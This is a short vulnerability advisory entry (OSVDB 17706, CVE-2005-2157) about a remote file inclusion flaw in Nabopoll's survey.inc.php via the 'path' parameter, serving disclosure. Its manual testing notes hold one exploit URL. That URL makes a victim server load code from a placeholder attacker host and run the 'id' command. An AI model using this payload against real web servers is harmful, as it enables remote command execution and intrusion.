Nabopoll survey.inc.php path Variable Remote File Inclusion

2005-07-01T10:16:31
ID OSVDB:17706
Type osvdb
Reporter V4mu(v4mu@a1ts.org)
Modified 2005-07-01T10:16:31

Description

Vulnerability Description

Nabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Nabopoll contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to survey.inc.php not properly sanitizing user input supplied to the path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/nabopoll/survey.inc.php?path=3Dhttp://[attacker]/test/xpl.php?cmd=3Did

References:

Vendor URL: http://www.nabocorp.com/nabopoll/ Security Tracker: 1014355 Secunia Advisory ID:15910 CVE-2005-2157